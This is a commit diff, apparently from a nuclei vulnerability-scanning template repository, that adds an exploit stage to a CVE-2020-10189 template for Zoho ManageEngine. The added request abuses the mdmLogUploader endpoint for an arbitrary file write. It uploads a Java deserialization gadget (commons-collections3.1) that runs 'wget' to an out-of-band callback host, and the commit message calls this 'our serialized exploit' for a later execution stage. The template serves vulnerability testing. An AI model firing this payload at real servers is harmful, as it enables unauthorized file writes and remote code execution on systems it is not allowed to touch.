Add Stage 1

Stage 1 is the arbitrary file write. This code creates a new file on the Zoho ManageEngine server with our serialized exploit, which will be executed in the next stage.
projectdiscovery · Apr 30, 2024 · 2ec9eeb · 2ec9eeb
1 parent a58c003
commit 2ec9eeb
Showing 1 changed file with 15 additions and 0 deletions.
diff --git a/http/cves/2020/CVE-2020-10189.yaml b/http/cves/2020/CVE-2020-10189.yaml
@@ -13,6 +13,7 @@ info:
   tags: cve,cve2020,kev
 
 http:
+  # detect vulnerable version
   - method: GET
     path:
       - "https://{{Host}}:8383/configurations.do"
@@ -38,3 +39,17 @@ http:
       - type: dsl
         dsl:
           - compare_versions(version, '<10.0.474')
+  # arbitrary file write 
+  - method: POST
+    headers:
+      Content-Type: application/octet-stream
+    path:
+      # 'udid' is entirely attacker-controlled and 'logger.zip' is an allow-listed filename
+      - "https://{{Host}}:8383/mdm/client/v1/mdmLogUploader?udid={{rand_int()}}&filename=logger.zip"
+    # generate a serialized raw bytes payload
+    body: '{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}'
+
+    matchers:
+      - type: status
+        status:
+          - 200